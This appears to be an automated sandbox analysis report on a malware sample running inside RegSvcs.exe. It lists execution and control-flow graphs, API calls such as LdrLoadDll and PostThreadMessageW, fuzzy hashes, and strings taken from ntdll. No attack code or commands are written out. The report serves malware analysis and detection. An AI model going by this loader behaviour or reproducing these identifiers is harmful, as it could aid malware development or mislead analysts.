                                                                        execution_graph 88049 42bfc3 88050 42bfdd 88049->88050 88053 1462df0 LdrInitializeThunk 88050->88053 88051 42c002 88053->88051 88054 424cc3 88055 424cdf 88054->88055 88056 424d07 88055->88056 88057 424d1b 88055->88057 88058 42c983 NtClose 88056->88058 88064 42c983 88057->88064 88060 424d10 88058->88060 88061 424d24 88067 42eaf3 RtlAllocateHeap 88061->88067 88063 424d2f 88065 42c9a0 88064->88065 88066 42c9ae NtClose 88065->88066 88066->88061 88067->88063 88194 425053 88198 42506c 88194->88198 88195 4250b7 88196 42e9d3 RtlFreeHeap 88195->88196 88197 4250c4 88196->88197 88198->88195 88199 4250f4 88198->88199 88201 4250f9 88198->88201 88200 42e9d3 RtlFreeHeap 88199->88200 88200->88201 88202 42fa73 88203 42fa83 88202->88203 88204 42fa89 88202->88204 88207 42eab3 88204->88207 88206 42faaf 88210 42cc93 88207->88210 88209 42eace 88209->88206 88211 42ccad 88210->88211 88212 42ccbb RtlAllocateHeap 88211->88212 88212->88209 88068 414043 88070 414069 88068->88070 88069 414093 88070->88069 88072 413dc3 88070->88072 88075 42cc03 88072->88075 88076 42cc1d 88075->88076 88079 1462c70 LdrInitializeThunk 88076->88079 88077 413de5 88077->88069 88079->88077 88213 41a873 88214 41a88b 88213->88214 88216 41a8e5 88213->88216 88214->88216 88217 41e7a3 88214->88217 88218 41e7c9 88217->88218 88222 41e8c0 88218->88222 88223 42fba3 88218->88223 88220 41e85e 88221 42c013 LdrInitializeThunk 88220->88221 88220->88222 88221->88222 88222->88216 88224 42fb13 88223->88224 88225 42fb70 88224->88225 88226 42eab3 RtlAllocateHeap 88224->88226 88225->88220 88227 42fb4d 88226->88227 88228 42e9d3 RtlFreeHeap 88227->88228 88228->88225 88229 419133 88230 419163 88229->88230 88232 41918f 88230->88232 88233 41b5b3 88230->88233 88234 41b5f7 88233->88234 88235 42c983 NtClose 88234->88235 88236 41b618 88234->88236 88235->88236 88236->88230 88080 1462b60 LdrInitializeThunk 88081 4147a6 88085 414333 88081->88085 88091 414328 88081->88091 88082 41469a 88086 41434d 88085->88086 88097 417ac3 88086->88097 88088 41436b 88089 4143b0 88088->88089 88090 41439f PostThreadMessageW 88088->88090 88089->88082 88090->88089 88092 4142bd 88091->88092 88092->88091 88093 417ac3 2 API calls 88092->88093 88094 41436b 88093->88094 88095 4143b0 88094->88095 88096 41439f PostThreadMessageW 88094->88096 88095->88082 88096->88095 88099 417ac4 88097->88099 88098 417aee 88098->88088 88099->88098 88101 417b0d 88099->88101 88104 42fe53 LdrLoadDll 88099->88104 88102 417b3a 88101->88102 88103 417b2d LdrLoadDll 88101->88103 88102->88088 88103->88102 88104->88101 88105 4018af 88106 4018e3 88105->88106 88109 42ff43 88106->88109 88112 42e583 88109->88112 88113 42e5a9 88112->88113 88124 407373 88113->88124 88115 42e5bf 88116 401ad5 88115->88116 88127 41b3c3 88115->88127 88118 42e5de 88119 42e5f3 88118->88119 88142 42cd13 88118->88142 88138 428563 88119->88138 88122 42e60d 88123 42cd13 ExitProcess 88122->88123 88123->88116 88126 407380 88124->88126 88145 416783 88124->88145 88126->88115 88128 41b3ef 88127->88128 88169 41b2b3 88128->88169 88131 41b434 88133 41b450 88131->88133 88136 42c983 NtClose 88131->88136 88132 41b41c 88134 41b427 88132->88134 88135 42c983 NtClose 88132->88135 88133->88118 88134->88118 88135->88134 88137 41b446 88136->88137 88137->88118 88139 4285c5 88138->88139 88141 4285d2 88139->88141 88180 418933 88139->88180 88141->88122 88143 42cd2d 88142->88143 88144 42cd3e ExitProcess 88143->88144 88144->88119 88146 41678d 88145->88146 88148 4167b6 88146->88148 88149 42d3a3 88146->88149 88148->88126 88151 42d3bd 88149->88151 88150 42d3ec 88150->88148 88151->88150 88156 42c013 88151->88156 88157 42c02d 88156->88157 88163 1462c0a 88157->88163 88158 42c056 88160 42e9d3 88158->88160 88166 42ccd3 88160->88166 88162 42d45f 88162->88148 88164 1462c11 88163->88164 88165 1462c1f LdrInitializeThunk 88163->88165 88164->88158 88165->88158 88167 42cced 88166->88167 88168 42ccfb RtlFreeHeap 88167->88168 88168->88162 88170 41b2cd 88169->88170 88174 41b3a9 88169->88174 88175 42c0a3 88170->88175 88173 42c983 NtClose 88173->88174 88174->88131 88174->88132 88176 42c0c0 88175->88176 88179 14635c0 LdrInitializeThunk 88176->88179 88177 41b39d 88177->88173 88179->88177 88182 41895d 88180->88182 88181 418e6b 88181->88141 88182->88181 88188 413fa3 88182->88188 88184 418a84 88184->88181 88185 42e9d3 RtlFreeHeap 88184->88185 88186 418a9c 88185->88186 88186->88181 88187 42cd13 ExitProcess 88186->88187 88187->88181 88192 413fc3 88188->88192 88190 41402c 88190->88184 88191 414022 88191->88184 88192->88190 88193 41b6d3 RtlFreeHeap LdrInitializeThunk 88192->88193 88193->88191

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 195 417ac3-417aec call 42f5b3 199 417af2-417b00 call 42fbb3 195->199 200 417aee-417af1 195->200 203 417b10-417b21 call 42e053 199->203 204 417b02-417b0d call 42fe53 199->204 209 417b23-417b37 LdrLoadDll 203->209 210 417b3a-417b3d 203->210 204->203 209->210
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B35
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
                                                                        • Instruction ID: 85ec300ad7e3bf87eb3ec33c385cea1828a43b2c1769026b01b249a8b40dda6b
                                                                        • Opcode Fuzzy Hash: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
                                                                        • Instruction Fuzzy Hash: 0B0175B1E0410DBBDF10DBE5DD42FDEB3789B14308F4081A6E90897241F674EB488795

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 222 42c983-42c9bc call 4046b3 call 42db73 NtClose
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: d455cc25c6fa6859147991c283176d5fa10c052c132fdc399feeef08a75897da
                                                                        • Instruction ID: cf24ea8bab9471c9394b10296e0f3c990884b57d23af52157aeed086e7eb975a
                                                                        • Opcode Fuzzy Hash: d455cc25c6fa6859147991c283176d5fa10c052c132fdc399feeef08a75897da
                                                                        • Instruction Fuzzy Hash: 60E04F726012147BD210AA5ADC41E9B775CEBC5714F408419FA48A7342C675B91186E9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 240 1462b60-1462b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: add815d2a5a7a64ad90e60a8563ee0ce6ad9d0bce20c52a84069633e08206745
                                                                        • Instruction ID: 15e6bfd57ade6d6efddfd964209354e4d5e1da77aa9a736fd7b3ff6562d2a033
                                                                        • Opcode Fuzzy Hash: add815d2a5a7a64ad90e60a8563ee0ce6ad9d0bce20c52a84069633e08206745
                                                                        • Instruction Fuzzy Hash: B490027120240103410571584418656400A97F0201B55C032E1014591DC63589956225
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: da0f6553456adf455130c60495fe9af2d98bd298f454b3c8d93f2cdc9daa8dcf
                                                                        • Instruction ID: c750160baa19f715617bd432b86c03dba9cae87245b9cbae0d6f6da60ecea77a
                                                                        • Opcode Fuzzy Hash: da0f6553456adf455130c60495fe9af2d98bd298f454b3c8d93f2cdc9daa8dcf
                                                                        • Instruction Fuzzy Hash: CC90023120140513D11171584508747000997E0241F95C423A0424559DD7668A56A221

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 241 1462c70-1462c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f09be347fbdf522eb15a2869874e6af3d2dbe073f1c1f0a47515d74d8572f376
                                                                        • Instruction ID: d804c3e64f1c276b3b48b8df6143221833a54c226848d930eebd924a35dccc88
                                                                        • Opcode Fuzzy Hash: f09be347fbdf522eb15a2869874e6af3d2dbe073f1c1f0a47515d74d8572f376
                                                                        • Instruction Fuzzy Hash: F190023120148902D1107158840878A000597E0301F59C422A4424659DC7A589957221
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 67bd818040d254c19299f56d314ca54b03b5123eb15fb2331032bee312583048
                                                                        • Instruction ID: 42431dc34975e4505897ffb0f278cf6122599ea87fc3b2db91252f76c4984271
                                                                        • Opcode Fuzzy Hash: 67bd818040d254c19299f56d314ca54b03b5123eb15fb2331032bee312583048
                                                                        • Instruction Fuzzy Hash: 4C90023160550502D10071584518746100597E0201F65C422A0424569DC7A58A5566A2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 414328-41432a 133 414350-414353 call 42f483 132->133 134 41432c 132->134 138 414358-414366 call 417ac3 133->138 136 4142bd 134->136 137 41432d-41434d call 42ea73 134->137 136->137 139 4142bf-4142d7 136->139 137->133 144 41436b-41439d call 404623 call 425193 138->144 139->132 149 4143bd-4143c3 144->149 150 41439f-4143ae PostThreadMessageW 144->150 150->149 151 4143b0-4143ba 150->151 151->149
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(I130O15,00000111,00000000,00000000), ref: 004143AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: I130O15$I130O15
                                                                        • API String ID: 1836367815-3409266677
                                                                        • Opcode ID: 6684cfdd1f1671d53cf00dd3ba155f4c41e9365b70e4de2108dfb1b9814b186b
                                                                        • Instruction ID: 31d067c27ce7e60a5001ff70b41e75f593da1e920bba3ec93a240c06ae4dddc9
                                                                        • Opcode Fuzzy Hash: 6684cfdd1f1671d53cf00dd3ba155f4c41e9365b70e4de2108dfb1b9814b186b
                                                                        • Instruction Fuzzy Hash: 81110A71D4010C7ED7119BA19C82DEFBFBCDF81798F4580AAFA1467241D6384A4A87E9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 152 414333-41439d call 42ea73 call 42f483 call 417ac3 call 404623 call 425193 164 4143bd-4143c3 152->164 165 41439f-4143ae PostThreadMessageW 152->165 165->164 166 4143b0-4143ba 165->166 166->164
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(I130O15,00000111,00000000,00000000), ref: 004143AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: I130O15$I130O15
                                                                        • API String ID: 1836367815-3409266677
                                                                        • Opcode ID: 9855e5b62a82f7f9731ad0e00c6b0f7a1d43282dd202bfe8f7d21e6f49592cea
                                                                        • Instruction ID: da83c1094935ef769818b01bdbdf88093f7488f1381d0aca91dd75c39da613a9
                                                                        • Opcode Fuzzy Hash: 9855e5b62a82f7f9731ad0e00c6b0f7a1d43282dd202bfe8f7d21e6f49592cea
                                                                        • Instruction Fuzzy Hash: 2801D6B2E0011C7ADB10AAE29C81DEFBB7CDF41798F448069FA1467241D67C4E0A47B9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 183 417b66-417b73 184 417b75 183->184 185 417b0f-417b21 183->185 186 417b77-417b82 184->186 187 417b23-417b2a 185->187 188 417b3a-417b3d 185->188 189 417b84 186->189 190 417bdd-417be2 186->190 191 417b2d-417b37 LdrLoadDll 187->191 192 417b85-417b9c 189->192 190->192 193 417be4-417bef 190->193 191->188 192->186 194 417b9e-417bc3 192->194 194->190
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B35
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 2a4877de3ab38fcd66a74c2feb24b935705f973e38b0e2d5d2aec6d285c1986e
                                                                        • Instruction ID: 68cdeca346d35fb34d904a1717cefdcf981d2e98a7cf94e3822ae669b9bfa3fe
                                                                        • Opcode Fuzzy Hash: 2a4877de3ab38fcd66a74c2feb24b935705f973e38b0e2d5d2aec6d285c1986e
                                                                        • Instruction Fuzzy Hash: 2A117A3590C1859BCB06CF74D8516DABBB4EF4270CB6582CAD4858F146E235D697C7C1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 217 42ccd3-42cd11 call 4046b3 call 42db73 RtlFreeHeap
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1C588B24,00000007,00000000,00000004,00000000,0041734B,000000F4), ref: 0042CD0C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: a77fb4d76808815fb4c39ac3582960cb882deaeb1e95a6d216d723fd855a594c
                                                                        • Instruction ID: 98ee737e8a7e142691a69487e85474ce60955f1355bfbabdd52204a28090c51f
                                                                        • Opcode Fuzzy Hash: a77fb4d76808815fb4c39ac3582960cb882deaeb1e95a6d216d723fd855a594c
                                                                        • Instruction Fuzzy Hash: 53E06DB26042087BD610EE59DC41EAB37ACEFC9710F000419FA08A7241D674B91086F8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 212 42cc93-42ccd1 call 4046b3 call 42db73 RtlAllocateHeap
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,0041E85E,?,?,00000000,?,0041E85E,?,?,?), ref: 0042CCCC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 4e795ad3abe48be91c9768a8c28ff3aa56d5b80a9b26f967635e1cd9e3235224
                                                                        • Instruction ID: 735cc1ea21d3193d45840a595983d75bb8b9258a4762a6d953b28341c442f013
                                                                        • Opcode Fuzzy Hash: 4e795ad3abe48be91c9768a8c28ff3aa56d5b80a9b26f967635e1cd9e3235224
                                                                        • Instruction Fuzzy Hash: 5AE0EDB26042187BD614EE59DC41EAB77ACEFC5714F004419FE08A7242D675B95186B8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 227 42cd13-42cd4c call 4046b3 call 42db73 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,0000E934,?,?,0000E934), ref: 0042CD47
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 94cb34bb670272ca3f35d8fa057e48407cd231f13534b7af3fe052762f7cd892
                                                                        • Instruction ID: cf49a35210b173e9913d4f39f63bec6c409ba42b77089890b2c44588182139b1
                                                                        • Opcode Fuzzy Hash: 94cb34bb670272ca3f35d8fa057e48407cd231f13534b7af3fe052762f7cd892
                                                                        • Instruction Fuzzy Hash: 4DE04F723406147BD620AA5AEC41F9B776CDFC5754F00845AFA1867281C6B5790087F8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 417b43-417b4d 233 417b2d-417b37 LdrLoadDll 232->233 234 417b4f-417b5d 232->234 235 417b3a-417b3d 233->235
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B35
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: dafc9d77bb24dd9c684dee61d566ed27b36c235a6c29ef8d1e3c8508bb4aa5ed
                                                                        • Instruction ID: bce0a5e40328678734bcb9fc0fbb0637af48228f8683d2e30f1ac46fd5b01f54
                                                                        • Opcode Fuzzy Hash: dafc9d77bb24dd9c684dee61d566ed27b36c235a6c29ef8d1e3c8508bb4aa5ed
                                                                        • Instruction Fuzzy Hash: 3DD02BB440920C77E52065C95C06FDB7F7DCB81604F000249BD09551419A10A911C5ED

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 1462c0a-1462c0f 237 1462c11-1462c18 236->237 238 1462c1f-1462c26 LdrInitializeThunk 236->238
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f6f74bcd47975b36e83420b2ea5e622f9a13712478cd2502d361d0fde4ba2153
                                                                        • Instruction ID: 1652681ba7f666d9345951e9e80a9fa7bcf55f6ad23245ccebe64a66eb6d4bd1
                                                                        • Opcode Fuzzy Hash: f6f74bcd47975b36e83420b2ea5e622f9a13712478cd2502d361d0fde4ba2153
                                                                        • Instruction Fuzzy Hash: 62B09B719015C5D9DA11F764460CB17790477D0705F15C073D3030653F4778C1D5E276
                                                                        Strings
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014D8FEF
                                                                        • read from, xrefs: 014D8F5D, 014D8F62
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014D8DC4
                                                                        • The resource is owned shared by %d threads, xrefs: 014D8E2E
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014D8E86
                                                                        • *** enter .exr %p for the exception record, xrefs: 014D8FA1
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014D8E4B
                                                                        • a NULL pointer, xrefs: 014D8F90
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 014D8DA3
                                                                        • *** Inpage error in %ws:%s, xrefs: 014D8EC8
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014D8D8C
                                                                        • *** enter .cxr %p for the context, xrefs: 014D8FBD
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014D8F34
                                                                        • <unknown>, xrefs: 014D8D2E, 014D8D81, 014D8E00, 014D8E49, 014D8EC7, 014D8F3E
                                                                        • The instruction at %p referenced memory at %p., xrefs: 014D8EE2
                                                                        • This failed because of error %Ix., xrefs: 014D8EF6
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014D8DB5
                                                                        • The critical section is owned by thread %p., xrefs: 014D8E69
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014D8DD3
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 014D8F3F
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014D8F2D
                                                                        • The resource is owned exclusively by thread %p, xrefs: 014D8E24
                                                                        • Go determine why that thread has not released the critical section., xrefs: 014D8E75
                                                                        • *** then kb to get the faulting stack, xrefs: 014D8FCC
                                                                        • write to, xrefs: 014D8F56
                                                                        • an invalid address, %p, xrefs: 014D8F7F
                                                                        • The instruction at %p tried to %s , xrefs: 014D8F66
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014D8F26
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 014D8E02
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014D8E3F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 030f583988c73d1fe4b59da919439c7fd85335a120296358d6a07541c51f2e95
                                                                        • Instruction ID: 7944aff4abdcd1c0cc13789f88e0605f125cd1171acaee58ea70b30f2c6177a3
                                                                        • Opcode Fuzzy Hash: 030f583988c73d1fe4b59da919439c7fd85335a120296358d6a07541c51f2e95
                                                                        • Instruction Fuzzy Hash: 8A81C676640201BFDF119B5A9CA5DBF3F35EB66B24F45004FF208AB276E3758412CA61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: cd26dd6bc3e9509f823b6d19694b27e405d7f331e83a29fc3f35ffdb26f689d7
                                                                        • Instruction ID: dd9530ebf40027f84f1df2b409238e44b1b0245f33776a6a8d7d4067ec8241cf
                                                                        • Opcode Fuzzy Hash: cd26dd6bc3e9509f823b6d19694b27e405d7f331e83a29fc3f35ffdb26f689d7
                                                                        • Instruction Fuzzy Hash: 6292C071604342AFE721CF19C840F6BBBE8BBA4754F45482EFA94D7260D7B0E845DB92
                                                                        Strings
                                                                        • 8, xrefs: 014952E3
                                                                        • Address of the debug info found in the active list., xrefs: 014954AE, 014954FA
                                                                        • Critical section debug info address, xrefs: 0149541F, 0149552E
                                                                        • Thread identifier, xrefs: 0149553A
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01495543
                                                                        • double initialized or corrupted critical section, xrefs: 01495508
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014954CE
                                                                        • corrupted critical section, xrefs: 014954C2
                                                                        • undeleted critical section in freed memory, xrefs: 0149542B
                                                                        • Critical section address, xrefs: 01495425, 014954BC, 01495534
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014954E2
                                                                        • Critical section address., xrefs: 01495502
                                                                        • Invalid debug info address of this critical section, xrefs: 014954B6
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0149540A, 01495496, 01495519
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: aa67cd27eb4fb66b5506d6c4e3d954bc6307e9ef876c995fadc59ff56a7901f5
                                                                        • Instruction ID: 9a686fc5eb535dfb85e5fe3c5d44e997220b2e45d28826bcedac894c7c062c9d
                                                                        • Opcode Fuzzy Hash: aa67cd27eb4fb66b5506d6c4e3d954bc6307e9ef876c995fadc59ff56a7901f5
                                                                        • Instruction Fuzzy Hash: C4818070E40359AFDF22CF9AC945BAEBBB5BB48714F20412BF504BB2A1D371A945CB50
                                                                        Strings
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01492412
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0149261F
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01492498
